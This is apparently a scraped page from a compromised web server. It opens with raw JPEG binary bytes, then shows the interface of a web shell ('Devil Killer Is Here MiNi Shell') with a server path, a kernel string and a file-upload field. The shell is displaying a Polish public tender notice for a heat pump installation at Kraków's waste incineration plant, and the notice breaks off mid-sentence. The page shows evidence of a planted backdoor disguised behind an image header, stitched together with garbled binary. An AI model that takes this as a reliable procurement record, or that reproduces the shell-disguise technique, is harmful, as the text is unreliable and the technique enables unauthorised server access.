JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220804/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220804/0029145401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Robota budowlana: usługi zaprojektowania, uzyskania decyzji administracyjnych, dostawy, montażu i uruchomienia instalacji absorpcyjnej pompy ciepła (APC)w Zakładzie Termicznego Przekształcania Odpadów </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Krakowski Holding Komunalny S. A. w Krakowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 351118089</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Jana Brożka</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">30-347</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@khk.krakow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://khk.krakow.pl/pl/bip/ogloszenia-i-przetargi/zamowienia-publiczne/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Robota budowlana: usługi zaprojektowania, uzyskania decyzji administracyjnych, dostawy, montażu i uruchomienia instalacji absorpcyjnej pompy ciepła (APC)w Zakładzie Termicznego Przekształcania Odpadów </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5fe01dfa-1245-11ed-8c68-c68bc3dc99bc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00291454</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-08-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/khk <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/khk</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">14.1. Komunikacja w postępowaniu o<br/>udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między<br/>Zamawiającym a Wykonawcą, z uwzględnieniem wyjątków określonych w PZP, odbywa się przy użyciu środków komunikacji<br/>elektronicznej.<br/>14.2. Komunikacja ustna dopuszczalna jest w odniesieniu do informacji, które nie są istotne, w szczególności nie dotyczą ogłoszenia<br/>o zamówieniu lub dokumentów zamówienia, potwierdzenia zainteresowania, ofert, o ile jej treść jest udokumentowana.<br/>14.4. Oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują elektronicznie poprzez:<br/>https://platformazakupowa.pl/pn/khk (wyjątkowo na adres mailowy: przetargi@khk.krakow.pl).<br/>UWAGA: niedopuszczalnym jest złożenie oferty w sposób inny niż wskazany w pkt 18. SWZ.<br/>14.5. Platforma, o której mowa w pkt. poprzedzającym:<br/>14.5.1. Instrukcja obsługi platformy, znajduje się pod linkiem: https://platformazakupowa.pl/strona/45-instrukcje;<br/>14.5.2. Komunikacja poprzez „Wyślij wiadomość” umożliwia dodanie do treści wysyłanej wiadomości plików lub spakowanego<br/>katalogu (załączników). Występuje limit objętości plików lub spakowanych folderów do ilości 10 plików lub spakowanych folderów<br/>przy maksymalnej sumarycznej wielkości 500 MB;<br/>14.5.3. Składanie ofert: występuje limit objętości plików lub spakowanych folderów w zakresie całej oferty do ilości 10 plików lub<br/>spakowanych folderów, przy maksymalnej wielkości 150 MB każdego z nich.<br/>14.6. Każda ze stron na żądanie drugiej, niezwłocznie potwierdza fakt otrzymania oświadczeń, wniosków, zawiadomień lub<br/>informacji.<br/>14.7. Osobą uprawnioną do porozumiewania się z Wykonawcami jest: Paweł Urbańczyk/ Elżbieta Kurek.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">26.1. Zamawiający informuje, że:<br/>26.1.1. administratorem Pani/Pana danych osobowych jest Zamawiający.<br/>26.1.2. Kontakt do inspektora ochrony danych osobowych: iod@khk.krakow.pl, tel.: 12 269 15 05.<br/>26.1.3. Pani/Pana dane osobowe przetwarzane będą w związku z koniecznością wypełnienia obowiązku prawnego ciążącego na<br/>zamawiającym, w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego.<br/>26.1.4. odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 18 oraz art. 74 ust. 1 PZP oraz odpowiednie organy kontrole w zakresie ich kompetencji;<br/>26.1.5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy. Dane te mogą być przechowywane przez okres dłuższy niż wskazany, o ile wynika to z ustawy z dnia 14 lipca 1983<br/>r. o narodowym zasobie archiwalnym i archiwach (t. j. Dz. U. z 2020 r. poz. 164<br/>z późn. zm.) i przepisów wykonawczych do tej ustawy.<br/>26.1.6. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy PZP;<br/>26.1.7. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany.<br/>26.1.8. posiada Pani/Pan:<br/>26.1.8.1. prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>26.1.8.2. prawo do sprostowania Pani/Pana danych osobowych (Wyjaśnienie: skorzystanie z prawa do sprostowania nie może<br/>skutkować zmianą wyniku postępowania)<br/>26.1.8.3. prawo żądania od administratora ograniczenia przetwarzania danych osobowych (prawo do ograniczenia przetwarzania nie<br/>ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu<br/>ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego);<br/>26.1.8.4. prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy;<br/>26.1.9. nie przysługuje Pani/Panu:<br/>26.1.9.1. prawo do usunięcia danych osobowych;<br/>26.1.9.2. prawo do przenoszenia danych osobowych;<br/>26.1.9.3. prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych<br/>osobowych jest konieczność wypełnienia obowiązku prawnego ciążącego na zamawiającym.<br/>26.2. Ponadto Zamawiający informuje, iż:<br/>26.2.1. w przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby<br/>niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji<br/>mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia<br/>publicznego lub konkursu;26.2.2. wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych<br/>osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">KZP-271-TP-12/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.1.	Przedmiotem zamówienia jest robota budowlana: usługi zaprojektowania, uzyskania decyzji administracyjnych, dostawy, montażu i uruchomienia instalacji absorpcyjnej pompy ciepła (APC) w Zakładzie Termicznego Przekształcania Odpadów (ZTPO) przy ul. Giedroycia 23 w Krakowie.<br/>3.2.	Przedmiot zamówienia zostanie wykonany w następujących zakresach:<br/>zakres I: Opracowanie i uzyskanie zatwierdzenia Przedstawiciela Zamawiającego Projektu Podstawowego;<br/>zakres II: Opracowanie i uzyskanie zatwierdzenia Przedstawiciela Zamawiającego kompletnych projektów: Technicznego i Architektoniczno-budowlanego oraz wniosku o pozwolenia na budowę i złożenie wniosku w odpowiednim organie administracji publicznej (projekt Architektoniczno-budowalny wraz z wnioskiem wymagany tylko i wyłącznie w przypadkach wynikających z Prawa budowlanego);<br/>zakres III: Opracowanie i uzyskanie zatwierdzenia Zamawiającego Projektu Wykonawczego;<br/>zakres IV: Dostawa i montaż instalacji APC;<br/>zakres V: Przeprowadzenie Ruchu Regulacyjnego; <br/>zakres VI: Przeprowadzenie Ruchu Próbnego*; <br/>zakres VII: Przekazanie instalacji APC do użytkowania tj. pozytywne zakończenie Ruchu Próbnego i Pomiarów Gwarancyjnych oraz przekazanie niezbędnych do eksploatacji zgód i decyzji wraz z Dokumentacją Powykonawczą.<br/>*Podczas Ruchu Próbnego wykonane zostaną pomiary Parametrów Gwarancyjnych. Plan pomiarów zostanie ustalony przez Niezależny Podmiot.<br/>3.3.	Szczegółowy opis przedmiotu zamówienia stanowi Program Funkcjonalno-Użytkowy (PFU).<br/>3.4.	Miejsce realizacji umowy: Zakład Termicznego Przekształcania Odpadów w Krakowie ul Giedroycia 23.<br/>3.5.	Kody CPV: <br/> 42164000-6 - Układy pomocnicze do kotłów grzewczych <br/>42122000-0 - Pompy <br/>42511100-2 - Wymienniki ciepła <br/>44110000-4 - Materiały konstrukcyjne <br/>44140000-3 - Produkty związane z materiałami budowlanymi <br/>44160000-9- Rurociągi, instalacje rurowe, rury, okładziny rurowe, rury i podobne elementy <br/>45000000-7 - Roboty budowlane <br/>45300000-0 - Roboty instalacyjne w budynkach <br/>45251250-8 - Roboty budowlane w zakresie lokalnych zakładów grzewczych <br/>45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych <br/>45314000-1 - Instalowanie urządzeń telekomunikacyjnych <br/>45317000-2 - Inne instalacje elektryczne <br/>45320000-6 - Roboty izolacyjne <br/>45321000-3 - Izolacja cieplna <br/>45323000-7 - Roboty w zakresie izolacji dźwiękoszczelnych <br/>45332000-3 - Roboty instalacyjne wodne i kanalizacyjne <br/>45351000-2 - Mechaniczne instalacje inżynieryjne <br/>71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne <br/>71200000-0 - Usługi architektoniczne i podobne <br/>71221000-3 - Usługi architektoniczne w zakresie obiektów budowlanych <br/>71300000-1 - Usługi inżynieryjne <br/>71310000-4 - Doradcze usługi inżynieryjne i budowlane <br/>71325000-2 - Usługi projektowania fundamentów <br/>71320000-7- Usługi Inżynieryjne w zakresie projektowania <br/>71321000-4 - Usługi inżynierii projektowej dla mechanicznych i elektrycznych instalacji budowlanych <br/>71327000-6 - Usługi projektowania konstrukcji nośnych <br/>80500000-9 - Usługi szkoleniowe.<br/>3.6.	Minimalny okres rękojmi i gwarancji na wykonane Roboty Budowlane wynosi 5 lat, natomiast na dostarczoną instalację i urządzenia APC – 2 lata. Wykonawca w tramach kryterium oceny ofert może zaoferować dłuższy termin.<br/>3.7.	Zamawiający wymaga, aby Wykonawca miał wdrożony system zarządzania jakością oparty na normie ISO 9001, lub inny równorzędny system zarządzania jakością, certyfikowany przez niezależną jednostkę.<br/>3.8.	Zamawiający zwraca uwagę (zgodnie z pkt. 1.1 PFU), że brak spełnienia przez Wykonawcę Minimalnego Parametru Wymaganego przez Zamawiającego opisanego szczegółowo w tabeli nr 7 PFU w przedstawionej ofercie dla chociaż jednej temperatury powietrza zewnętrznego spowoduje odrzucenie oferty Wykonawcy. <br/>3.9.	Zamawiający wymaga, aby Wykonawca wskazał preparaty i substancje niebezpieczne przewidywane do zastosowania w trakcie realizacji przedmiotu zamówienia, według Rozporządzenia Ministra Zdrowia z dnia 10 sierpnia 2012 r. w sprawie kryteriów i sposobu klasyfikacji substancji chemicznych i ich mieszanin (Dz.U. 2012 poz. 1018) lub złożył oświadczenie, że nie będzie stosować preparatów i substancji niebezpiecznych;<br/>3.10.	Wykonawca/osoby realizujące przedmiot Umowy zobowiązane są posiadać Świadectwo Kwalifikacyjne uprawniające do wykonywania eksploatacji urządzeń instalacji i sieci w branży energetycznej oraz uprawnienia dotyczące wytwarzania, montażu, modernizacji i naprawy urządzeń ciśnieniowych, podlegających Urzędu Dozoru Technicznego lub równoważne.<br/>3.11.	Miejsce realizacji umowy: Zakład Termicznego Przekształcania Odpadów w Krakowie ul. Giedroycia 23, 31-981 Kraków. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">42164000-6 - Układy pomocnicze do kotłów grzewczych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">42122000-0 - Pompy</p> <p class="mb-0">42511100-2 - Wymienniki ciepła</p> <p class="mb-0">44110000-4 - Materiały konstrukcyjne</p> <p class="mb-0">44140000-3 - Produkty związane z materiałami budowlanymi</p> <p class="mb-0">44160000-9 - Rurociągi, instalacje rurowe, rury, okładziny rurowe, rury i podobne elementy</p> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45251250-8 - Roboty budowlane w zakresie lokalnych zakładów grzewczych</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45314000-1 - Instalowanie urządzeń telekomunikacyjnych</p> <p class="mb-0">45317000-2 - Inne instalacje elektryczne</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <p class="mb-0">45323000-7 - Roboty w zakresie izolacji dźwiękoszczelnych</p> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <p class="mb-0">45351000-2 - Mechaniczne instalacje inżynieryjne</p> <p class="mb-0">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</p> <p class="mb-0">71200000-0 - Usługi architektoniczne i podobne</p> <p class="mb-0">71221000-3 - Usługi architektoniczne w zakresie obiektów budowlanych</p> <p class="mb-0">71300000-1 - Usługi inżynieryjne</p> <p class="mb-0">71310000-4 - Doradcze usługi inżynieryjne i budowlane</p> <p class="mb-0">71325000-2 - Usługi projektowania fundamentów</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">71321000-4 - Usługi inżynierii projektowej dla mechanicznych i elektrycznych instalacji budowlanych</p> <p class="mb-0">71327000-6 - Usługi projektowania konstrukcji nośnych</p> <p class="mb-0">80500000-9 - Usługi szkoleniowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">450 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">75</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium gwarancji i rękojmi na dostarczoną instalację i urządzenia APC</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium technologiczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 11.1.3.	spełnia warunki dotyczące sytuacji ekonomicznej lub finansowej, tj.: posiada własne środki finansowe lub zdolność kredytową w wysokości co najmniej 1 500 000,00 złotych (słownie: jeden milion pięćset tysięcy złotych); <br/>11.1.4.	spełnia warunki dotyczące zdolności technicznej lub zawodowej, tj.: <br/>11.1.4.1.	posiada doświadczenie niezbędne do realizacji zamówienia, tj. w okresie ostatnich 10 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) wykonał co najmniej dwie instalacje, w których źródłem była pompa ciepła lub urządzenie chłodnicze o odbiorze ciepła w dolnym źródle nie niższym niż 0,5 MWt.<br/>11.1.4.2.	posiada doświadczenie niezbędne do realizacji zamówienia, tj. w okresie ostatnich 10 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) wykonał co najmniej 2 instalacje energetyczne wodne lub parowe o ciśnieniu roboczym min 25 bar(g) i przepływie powyżej 100 m3/h, które podlegały odbiorowi przez Urząd Dozoru Technicznego lub odpowiednik w krajach UE, EOG lub EFTA, których wartość każdej roboty nie była niższa niż 1 000 000,00 PLN<br/>11.1.4.3.	posiada warunki do realizacji zamówienia, tj. producenci kluczowych urządzeń (pompy ciepła, pomp w obiegu ciepłowniczym i stacji redukcyjnej posiadają) dysponują autoryzowanym serwisem w odległości, która pozwoli dotrzeć pojazdem samochodowym do ZTPO pracownikowi serwisu w czasie nie dłuższym niż 12h i czas potencjalnej dostawy (od złożenia zamówienia do dostarczenia na teren ZTPO) części zamiennych (wyszczególnionych w DTR urządzeń: pompy ciepła, pomp obiegu ciepłowniczego, stacji redukcyjnej) z magazynu Wykonawcy lub producenta nie będzie dłuższy niż 36h. W okres 36h nie wliczane są dni świąteczne w Polsce. <br/>11.1.4.4.	dysponuje potencjałem osobowym niezbędnym do realizacji zamówienia, tj.: dysponuje personelem, który będzie uczestniczył w wykonywaniu zamówienia, w ilości zapewniającej należyte wykonanie przedmiotu zamówienia, w tym posiadającym:<br/>11.1.4.4.1.	główny projektant - osoba posiadająca doświadczenie i kwalifikacje: w ciągu ostatnich 10 lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) zaprojektował lub kierował zespołem projektowym i zatwierdzał poszczególne elementy dokumentacji od rozpoczęcia do zakończenia, 